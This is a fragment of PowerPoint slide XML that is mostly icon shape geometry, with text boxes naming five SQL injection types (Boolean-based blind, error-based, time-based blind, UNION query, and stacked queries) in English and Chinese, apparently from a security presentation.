                    <a:cubicBezTo>
                      <a:pt x="180" y="0"/>
                      <a:pt x="156" y="0"/>
                      <a:pt x="156" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="38"/>
                      <a:pt x="156" y="68"/>
                      <a:pt x="156" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="104"/>
                      <a:pt x="128" y="132"/>
                      <a:pt x="92" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="132"/>
                      <a:pt x="91" y="132"/>
                      <a:pt x="91" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="132"/>
                      <a:pt x="90" y="132"/>
                      <a:pt x="90" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="132"/>
                      <a:pt x="90" y="132"/>
                      <a:pt x="90" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="132"/>
                      <a:pt x="89" y="132"/>
                      <a:pt x="89" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="132"/>
                      <a:pt x="24" y="104"/>
                      <a:pt x="24" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="68"/>
                      <a:pt x="24" y="38"/>
                      <a:pt x="24" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="68"/>
                      <a:pt x="0" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="33" y="149"/>
                      <a:pt x="76" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="194"/>
                      <a:pt x="76" y="194"/>
                      <a:pt x="76" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="209"/>
                      <a:pt x="22" y="209"/>
                      <a:pt x="22" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="209"/>
                      <a:pt x="159" y="209"/>
                      <a:pt x="159" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="193"/>
                      <a:pt x="104" y="193"/>
                      <a:pt x="104" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="156"/>
                      <a:pt x="104" y="156"/>
                      <a:pt x="104" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="150"/>
                      <a:pt x="180" y="113"/>
                      <a:pt x="180" y="6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" name="Freeform 627"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7000875" y="6365875"/>
                <a:ext cx="61912" cy="134937"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 87"/>
                  <a:gd name="T1" fmla="*/ 190 h 190"/>
                  <a:gd name="T2" fmla="*/ 43 w 87"/>
                  <a:gd name="T3" fmla="*/ 190 h 190"/>
                  <a:gd name="T4" fmla="*/ 44 w 87"/>
                  <a:gd name="T5" fmla="*/ 190 h 190"/>
                  <a:gd name="T6" fmla="*/ 87 w 87"/>
                  <a:gd name="T7" fmla="*/ 147 h 190"/>
                  <a:gd name="T8" fmla="*/ 87 w 87"/>
                  <a:gd name="T9" fmla="*/ 43 h 190"/>
                  <a:gd name="T10" fmla="*/ 44 w 87"/>
                  <a:gd name="T11" fmla="*/ 0 h 190"/>
                  <a:gd name="T12" fmla="*/ 43 w 87"/>
                  <a:gd name="T13" fmla="*/ 0 h 190"/>
                  <a:gd name="T14" fmla="*/ 43 w 87"/>
                  <a:gd name="T15" fmla="*/ 0 h 190"/>
                  <a:gd name="T16" fmla="*/ 0 w 87"/>
                  <a:gd name="T17" fmla="*/ 43 h 190"/>
                  <a:gd name="T18" fmla="*/ 0 w 87"/>
                  <a:gd name="T19" fmla="*/ 147 h 190"/>
                  <a:gd name="T20" fmla="*/ 43 w 87"/>
                  <a:gd name="T21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190">
                    <a:moveTo>
                      <a:pt x="43" y="190"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="190"/>
                      <a:pt x="43" y="190"/>
                      <a:pt x="43" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="190"/>
                      <a:pt x="44" y="190"/>
                      <a:pt x="44" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="190"/>
                      <a:pt x="87" y="171"/>
                      <a:pt x="87" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="19"/>
                      <a:pt x="68" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="0"/>
                      <a:pt x="44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71"/>
                      <a:pt x="19" y="190"/>
                      <a:pt x="43" y="19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21" name="组合 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="748734" y="4011278"/>
            <a:ext cx="636524" cy="636524"/>
            <a:chOff x="4574639" y="4908224"/>
            <a:chExt cx="624974" cy="624974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="椭圆 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4574639" y="4908224"/>
              <a:ext cx="624974" cy="624974"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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Freeform 188"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4724211" y="5107049"/>
              <a:ext cx="325829" cy="285101"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 277749990 w 288"/>
                <a:gd name="T1" fmla="*/ 0 h 252"/>
                <a:gd name="T2" fmla="*/ 184313998 w 288"/>
                <a:gd name="T3" fmla="*/ 56318761 h 252"/>
                <a:gd name="T4" fmla="*/ 92156434 w 288"/>
                <a:gd name="T5" fmla="*/ 0 h 252"/>
                <a:gd name="T6" fmla="*/ 0 w 288"/>
                <a:gd name="T7" fmla="*/ 92156636 h 252"/>
                <a:gd name="T8" fmla="*/ 46078782 w 288"/>
                <a:gd name="T9" fmla="*/ 184314402 h 252"/>
                <a:gd name="T10" fmla="*/ 184313998 w 288"/>
                <a:gd name="T11" fmla="*/ 322549921 h 252"/>
                <a:gd name="T12" fmla="*/ 322548083 w 288"/>
                <a:gd name="T13" fmla="*/ 184314402 h 252"/>
                <a:gd name="T14" fmla="*/ 368626865 w 288"/>
                <a:gd name="T15" fmla="*/ 92156636 h 252"/>
                <a:gd name="T16" fmla="*/ 277749990 w 288"/>
                <a:gd name="T17" fmla="*/ 0 h 2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88" h="252">
                  <a:moveTo>
                    <a:pt x="217" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="0"/>
                    <a:pt x="144" y="44"/>
                    <a:pt x="144" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="44"/>
                    <a:pt x="108" y="0"/>
                    <a:pt x="72" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="0"/>
                    <a:pt x="0" y="18"/>
                    <a:pt x="0" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="36" y="144"/>
                    <a:pt x="36" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="252"/>
                    <a:pt x="144" y="252"/>
                    <a:pt x="144" y="252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="144"/>
                    <a:pt x="252" y="144"/>
                    <a:pt x="252" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="144"/>
                    <a:pt x="288" y="111"/>
                    <a:pt x="288" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="18"/>
                    <a:pt x="253" y="0"/>
                    <a:pt x="217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4" name="文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1715770" y="1694180"/>
            <a:ext cx="5765800" cy="33718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Boolean-based blind SQL injection（布尔型注入）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1715770" y="2449195"/>
            <a:ext cx="5765800" cy="33718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Error-based SQL injection（报错型注入）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="765175" y="1464493"/>
            <a:ext cx="636524" cy="634908"/>
            <a:chOff x="9774936" y="2638044"/>
            <a:chExt cx="1554480" cy="1554480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 388"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10140336" y="3019531"/>
              <a:ext cx="823678" cy="791505"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T1" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T2" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T4" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T5" fmla="*/ 0 h 123"/>
                <a:gd name="T6" fmla="*/ 0 w 128"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T8" fmla="*/ 993818987 w 128"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T10" fmla="*/ 993818987 w 128"/>
                <a:gd name="T11" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T12" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T13" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T14" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T15" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T16" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T17" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T18" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T19" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T20" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T21" fmla="*/ 2147483646 h 123"/>
                <a:gd name="T22" fmla="*/ 2147483646 w 128"/>
                <a:gd name="T23" fmla="*/ 2147483646 h 12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8" h="123">
                  <a:moveTo>
                    <a:pt x="104" y="64"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="6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9774936" y="2638044"/>
              <a:ext cx="1554480" cy="1554480"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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6" name="文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1715770" y="3293110"/>
            <a:ext cx="5766435" cy="33718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Time-based blind SQL injection（基于时间延迟注入）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1715770" y="4138295"/>
            <a:ext cx="5766435" cy="33718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UNION query SQL injection（可联合查询注入）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1715135" y="5071110"/>
            <a:ext cx="5767070" cy="33718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Stacked queries SQL injection（可多语句查询注入）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762757" y="4849082"/>
            <a:ext cx="634908" cy="636524"/>
            <a:chOff x="4576741" y="3402931"/>
            <a:chExt cx="624974" cy="624974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="组合 52"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4703358" y="3541102"/>
              <a:ext cx="380528" cy="380528"/>
              <a:chOff x="5707063" y="5959475"/>
              <a:chExt cx="203200" cy="203200"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5707063" y="6010275"/>
                <a:ext cx="152400" cy="152400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 216"/>
                  <a:gd name="T1" fmla="*/ 83 h 216"/>
                  <a:gd name="T2" fmla="*/ 190 w 216"/>
                  <a:gd name="T3" fmla="*/ 83 h 216"/>
                  <a:gd name="T4" fmla="*/ 183 w 216"/>
                  <a:gd name="T5" fmla="*/ 66 h 216"/>
                  <a:gd name="T6" fmla="*/ 201 w 216"/>
                  <a:gd name="T7" fmla="*/ 49 h 216"/>
                  <a:gd name="T8" fmla="*/ 201 w 216"/>
                  <a:gd name="T9" fmla="*/ 48 h 216"/>
                  <a:gd name="T10" fmla="*/ 184 w 216"/>
                  <a:gd name="T11" fmla="*/ 31 h 216"/>
                  <a:gd name="T12" fmla="*/ 167 w 216"/>
                  <a:gd name="T13" fmla="*/ 15 h 216"/>
                  <a:gd name="T14" fmla="*/ 166 w 216"/>
                  <a:gd name="T15" fmla="*/ 15 h 216"/>
                  <a:gd name="T16" fmla="*/ 149 w 216"/>
                  <a:gd name="T17" fmla="*/ 32 h 216"/>
                  <a:gd name="T18" fmla="*/ 132 w 216"/>
                  <a:gd name="T19" fmla="*/ 25 h 216"/>
                  <a:gd name="T20" fmla="*/ 132 w 216"/>
                  <a:gd name="T21" fmla="*/ 0 h 216"/>
                  <a:gd name="T22" fmla="*/ 131 w 216"/>
                  <a:gd name="T23" fmla="*/ 0 h 216"/>
                  <a:gd name="T24" fmla="*/ 108 w 216"/>
                  <a:gd name="T25" fmla="*/ 0 h 216"/>
                  <a:gd name="T26" fmla="*/ 84 w 216"/>
                  <a:gd name="T27" fmla="*/ 0 h 216"/>
                  <a:gd name="T28" fmla="*/ 83 w 216"/>
                  <a:gd name="T29" fmla="*/ 0 h 216"/>
                  <a:gd name="T30" fmla="*/ 83 w 216"/>
                  <a:gd name="T31" fmla="*/ 25 h 216"/>
                  <a:gd name="T32" fmla="*/ 67 w 216"/>
                  <a:gd name="T33" fmla="*/ 32 h 216"/>
                  <a:gd name="T34" fmla="*/ 49 w 216"/>
                  <a:gd name="T35" fmla="*/ 15 h 216"/>
                  <a:gd name="T36" fmla="*/ 48 w 216"/>
                  <a:gd name="T37" fmla="*/ 15 h 216"/>
                  <a:gd name="T38" fmla="*/ 31 w 216"/>
                  <a:gd name="T39" fmla="*/ 31 h 216"/>
                  <a:gd name="T40" fmla="*/ 15 w 216"/>
                  <a:gd name="T41" fmla="*/ 48 h 216"/>
                  <a:gd name="T42" fmla="*/ 15 w 216"/>
                  <a:gd name="T43" fmla="*/ 49 h 216"/>
                  <a:gd name="T44" fmla="*/ 32 w 216"/>
                  <a:gd name="T45" fmla="*/ 66 h 216"/>
                  <a:gd name="T46" fmla="*/ 25 w 216"/>
                  <a:gd name="T47" fmla="*/ 83 h 216"/>
                  <a:gd name="T48" fmla="*/ 1 w 216"/>
                  <a:gd name="T49" fmla="*/ 83 h 216"/>
                  <a:gd name="T50" fmla="*/ 0 w 216"/>
                  <a:gd name="T51" fmla="*/ 84 h 216"/>
                  <a:gd name="T52" fmla="*/ 0 w 216"/>
                  <a:gd name="T53" fmla="*/ 108 h 216"/>
                  <a:gd name="T54" fmla="*/ 0 w 216"/>
                  <a:gd name="T55" fmla="*/ 131 h 216"/>
                  <a:gd name="T56" fmla="*/ 1 w 216"/>
                  <a:gd name="T57" fmla="*/ 132 h 216"/>
                  <a:gd name="T58" fmla="*/ 25 w 216"/>
                  <a:gd name="T59" fmla="*/ 132 h 216"/>
                  <a:gd name="T60" fmla="*/ 32 w 216"/>
                  <a:gd name="T61" fmla="*/ 149 h 216"/>
                  <a:gd name="T62" fmla="*/ 15 w 216"/>
                  <a:gd name="T63" fmla="*/ 166 h 216"/>
                  <a:gd name="T64" fmla="*/ 15 w 216"/>
                  <a:gd name="T65" fmla="*/ 167 h 216"/>
                  <a:gd name="T66" fmla="*/ 31 w 216"/>
                  <a:gd name="T67" fmla="*/ 184 h 216"/>
                  <a:gd name="T68" fmla="*/ 48 w 216"/>
                  <a:gd name="T69" fmla="*/ 201 h 216"/>
                  <a:gd name="T70" fmla="*/ 49 w 216"/>
                  <a:gd name="T71" fmla="*/ 201 h 216"/>
                  <a:gd name="T72" fmla="*/ 67 w 216"/>
                  <a:gd name="T73" fmla="*/ 183 h 216"/>
                  <a:gd name="T74" fmla="*/ 83 w 216"/>
                  <a:gd name="T75" fmla="*/ 190 h 216"/>
                  <a:gd name="T76" fmla="*/ 83 w 216"/>
                  <a:gd name="T77" fmla="*/ 215 h 216"/>
                  <a:gd name="T78" fmla="*/ 84 w 216"/>
                  <a:gd name="T79" fmla="*/ 216 h 216"/>
                  <a:gd name="T80" fmla="*/ 108 w 216"/>
                  <a:gd name="T81" fmla="*/ 216 h 216"/>
                  <a:gd name="T82" fmla="*/ 131 w 216"/>
                  <a:gd name="T83" fmla="*/ 216 h 216"/>
                  <a:gd name="T84" fmla="*/ 132 w 216"/>
                  <a:gd name="T85" fmla="*/ 215 h 216"/>
                  <a:gd name="T86" fmla="*/ 132 w 216"/>
                  <a:gd name="T87" fmla="*/ 190 h 216"/>
                  <a:gd name="T88" fmla="*/ 149 w 216"/>
                  <a:gd name="T89" fmla="*/ 183 h 216"/>
                  <a:gd name="T90" fmla="*/ 166 w 216"/>
                  <a:gd name="T91" fmla="*/ 201 h 216"/>
                  <a:gd name="T92" fmla="*/ 167 w 216"/>
                  <a:gd name="T93" fmla="*/ 201 h 216"/>
                  <a:gd name="T94" fmla="*/ 184 w 216"/>
                  <a:gd name="T95" fmla="*/ 184 h 216"/>
                  <a:gd name="T96" fmla="*/ 201 w 216"/>
                  <a:gd name="T97" fmla="*/ 167 h 216"/>
                  <a:gd name="T98" fmla="*/ 201 w 216"/>
                  <a:gd name="T99" fmla="*/ 166 h 216"/>
                  <a:gd name="T100" fmla="*/ 183 w 216"/>
                  <a:gd name="T101" fmla="*/ 149 h 216"/>
                  <a:gd name="T102" fmla="*/ 190 w 216"/>
                  <a:gd name="T103" fmla="*/ 132 h 216"/>
                  <a:gd name="T104" fmla="*/ 215 w 216"/>
                  <a:gd name="T105" fmla="*/ 132 h 216"/>
                  <a:gd name="T106" fmla="*/ 216 w 216"/>
                  <a:gd name="T107" fmla="*/ 131 h 216"/>
                  <a:gd name="T108" fmla="*/ 216 w 216"/>
                  <a:gd name="T109" fmla="*/ 108 h 216"/>
                  <a:gd name="T110" fmla="*/ 216 w 216"/>
                  <a:gd name="T111" fmla="*/ 84 h 216"/>
                  <a:gd name="T112" fmla="*/ 215 w 216"/>
                  <a:gd name="T113" fmla="*/ 83 h 216"/>
                  <a:gd name="T114" fmla="*/ 109 w 216"/>
                  <a:gd name="T115" fmla="*/ 143 h 216"/>
                  <a:gd name="T116" fmla="*/ 73 w 216"/>
                  <a:gd name="T117" fmla="*/ 107 h 216"/>
                  <a:gd name="T118" fmla="*/ 109 w 216"/>
                  <a:gd name="T119" fmla="*/ 71 h 216"/>
                  <a:gd name="T120" fmla="*/ 146 w 216"/>
                  <a:gd name="T121" fmla="*/ 107 h 216"/>
                  <a:gd name="T122" fmla="*/ 109 w 216"/>
                  <a:gd name="T123" fmla="*/ 14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6" h="216">
                    <a:moveTo>
                      <a:pt x="215" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="83"/>
                      <a:pt x="203" y="83"/>
                      <a:pt x="190" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="83"/>
                      <a:pt x="174" y="76"/>
                      <a:pt x="183" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="57"/>
                      <a:pt x="200" y="49"/>
                      <a:pt x="201" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="49"/>
                      <a:pt x="201" y="48"/>
                      <a:pt x="201" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="48"/>
                      <a:pt x="193" y="40"/>
                      <a:pt x="184" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="22"/>
                      <a:pt x="168" y="15"/>
                      <a:pt x="167" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="14"/>
                      <a:pt x="167" y="14"/>
                      <a:pt x="166" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="15"/>
                      <a:pt x="158" y="23"/>
                      <a:pt x="149" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="41"/>
                      <a:pt x="132" y="38"/>
                      <a:pt x="132" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="12"/>
                      <a:pt x="132" y="1"/>
                      <a:pt x="132" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="0"/>
                      <a:pt x="132" y="0"/>
                      <a:pt x="131" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="0"/>
                      <a:pt x="120" y="0"/>
                      <a:pt x="108" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="0"/>
                      <a:pt x="85" y="0"/>
                      <a:pt x="84" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="0"/>
                      <a:pt x="83" y="0"/>
                      <a:pt x="83" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="1"/>
                      <a:pt x="83" y="12"/>
                      <a:pt x="83" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="38"/>
                      <a:pt x="76" y="41"/>
                      <a:pt x="67" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="23"/>
                      <a:pt x="49" y="15"/>
                      <a:pt x="49" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="14"/>
                      <a:pt x="48" y="14"/>
                      <a:pt x="48" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="40" y="22"/>
                      <a:pt x="31" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="40"/>
                      <a:pt x="15" y="48"/>
                      <a:pt x="15" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="48"/>
                      <a:pt x="14" y="49"/>
                      <a:pt x="15" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="49"/>
                      <a:pt x="23" y="57"/>
                      <a:pt x="32" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="76"/>
                      <a:pt x="38" y="83"/>
                      <a:pt x="25" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="83"/>
                      <a:pt x="1" y="83"/>
                      <a:pt x="1" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="83"/>
                      <a:pt x="0" y="84"/>
                      <a:pt x="0" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="85"/>
                      <a:pt x="0" y="95"/>
                      <a:pt x="0" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="131"/>
                      <a:pt x="0" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="132"/>
                      <a:pt x="0" y="132"/>
                      <a:pt x="1" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="132"/>
                      <a:pt x="12" y="132"/>
                      <a:pt x="25" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="132"/>
                      <a:pt x="42" y="140"/>
                      <a:pt x="32" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="158"/>
                      <a:pt x="15" y="166"/>
                      <a:pt x="15" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="167"/>
                      <a:pt x="14" y="167"/>
                      <a:pt x="15" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="168"/>
                      <a:pt x="23" y="175"/>
                      <a:pt x="31" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="193"/>
                      <a:pt x="48" y="200"/>
                      <a:pt x="48" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="201"/>
                      <a:pt x="49" y="201"/>
                      <a:pt x="49" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="200"/>
                      <a:pt x="57" y="192"/>
                      <a:pt x="67" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="174"/>
                      <a:pt x="83" y="177"/>
                      <a:pt x="83" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="203"/>
                      <a:pt x="83" y="214"/>
                      <a:pt x="83" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="215"/>
                      <a:pt x="84" y="216"/>
                      <a:pt x="84" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="216"/>
                      <a:pt x="95" y="216"/>
                      <a:pt x="108" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="216"/>
